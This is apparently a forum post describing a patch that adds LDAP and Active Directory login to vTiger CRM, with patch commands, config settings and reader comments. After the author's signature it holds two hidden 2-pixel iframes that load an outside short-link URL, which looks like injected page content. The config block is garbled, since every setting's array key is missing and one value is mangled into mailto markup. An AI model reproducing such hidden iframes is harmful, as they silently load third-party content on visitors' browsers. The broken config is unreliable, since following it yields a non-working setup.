Please note: The patch has been tested against OpenLDAP. I would like someone with AD access to let me know if AD authentication works.
This patch works against vTiger 4.0.1, 4.2 (alpha) and 4.2 CVS.
Usage:
After patching (directions below), you have an option in your config.php file to change $AUTHCFG to SQL, AD, or LDAP. When running in SQL mode (the default) vTiger works as normal, and checks passwords against the database.
In LDAP or AD mode, vTiger will check users' passwords against the directory server. NOTE: ACCOUNTS MUST EXIST IN BOTH VTIGER AND THE DIRECTORY SERVER FOR THIS TO WORK. THE ACCOUNT NAMES MUCH MATCH. PASSWORDS, HOWEVER, NEED NOT BE SET IN VTIGER.
Once you switch the authType variable in config.php, this patch will only authenticate against the directory server. Please ensure you have created at least one admin user in vTiger that also exists in your directory before switching to AD or LDAP mode.
This patch will also remove the change password button in vTiger when using AD or LDAP authentication. You will change your password using your directory services.
Files modified by patch:
* install/4createConfigFile.php
* modules/Users/User.php
* modules/Users/DetailView.php
Files added by patch:
* modules/Users/authTypes/
* LDAP.php
* adLDAP.php
To patch (in Unix):
* Copy the authTypes directory to modules/Users/
* Copy the User.php.patch and DetailView.php.patch files to
modules/Users/
* CD to the modules/Users/ directory
* patch --verbose -p0 <DetailView.php.patch
* patch --verbose -p0 <User.php.patch
* Copy the 4createConfigFile.php.patch file to install/
* CD to install/
* patch --verbose -p0 <4createConfigFile.php.patch
The installer will now add the following lines to config.php. If you are installing a fresh copy, patch your installer and install. Then add users to vTiger (without setting passwords). Then edit config.php. If you are patching an existing installation, add the following lines to your config:
//AUTHCFG
$AUTHCFG = 'SQL'; //Can either by LDAP, AD, or SQL
//Config Options for LDAP
$AUTHCFG = 'localhost';
$AUTHCFG = NULL;
$AUTHCFG = 'dc=localhost,dc=com';
$AUTHCFG = 'uid'; //can be CN or UID depending on ldap install
$AUTHCFG = NULL;
$AUTHCFG = NULL;
//Config Options for Active Directory
$AUTHCFG = <!-- e --><a href="mailto:'
@mydomain.local">'
@mydomain.local</a><!-- e -->';
$AUTHCFG = 'DC=mydamin,DC=local';
$AUTHCFG = array ( "dc.mydomain.local" ); //array of domain controllers
$AUTHCFG = NULL; //optional user/pass for searching
$AUTHCFG = NULL;
$AUTHCFG = true; //AD does not return the primary group. Setting this to false will fudge "Domain Users" and is much faster. True will resolve the real primary group, but may be resource intensive.
--
LDAP and AD patch for vTiger written by:
Daniel Jabbour
iWebPress Incorporated, <!-- w --><a class="postlink" href="http://www.iwebpress.com">www.iwebpress.com</a><!-- w -->
djabbour - a t - iwebpress - d o t - com <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
Comments
i am really interested in what you did cause, i am testing vtiger for a client who would be running with iis6.0/mysql/php and who would like integrated authentification, of course the integrated authentification would only work if the vtiger code would be ldap aware, would it be complicated to add to your code that is accepts the ntlm/kerberos authentification on the fly on the login page ??? if the vtiger login users the msad credentials it is already a good start, if authentification occurs by itself on the login page it would be even greater.
if i could do something to help this work...
thanks
a far simpler solution would be to use this patch, upgrade your client to at least windows 2000 server (preferably 2003) and simply have the vtiger authentication page use ad authentication to the active directory so user passwords will authenticate to the directory server. good luck.
trying active directory. get the following error:
fatal error: call to undefined function: ldap_connect() in /opt/vtigercrm4_0_1/apache/htdocs/vtigercrm/modules/users/authtypes/adldap.php on line 81
there is just a minor bug. in the user.php.patch file:
+ case 'ad':
+ $this->log->debug("using active directory authentication");
+ require_once('modules/users/authtypes/adldap.php');
+ $adldap = new adldap();
+ if ($adldap->authenticate($this->user_names,$user_password)) {
+ return true;
+ } else {
+ return false;
+ }
+ break;
"$this->user_names" should be "$this->user_name".
this works perfectly aginst ad (tested against windows 2000 domain controller).
this patch/feature rocks! please include in base software.
great job!!
thanks!
is there anything i should know before trying it with novell's edirectory?
-dutler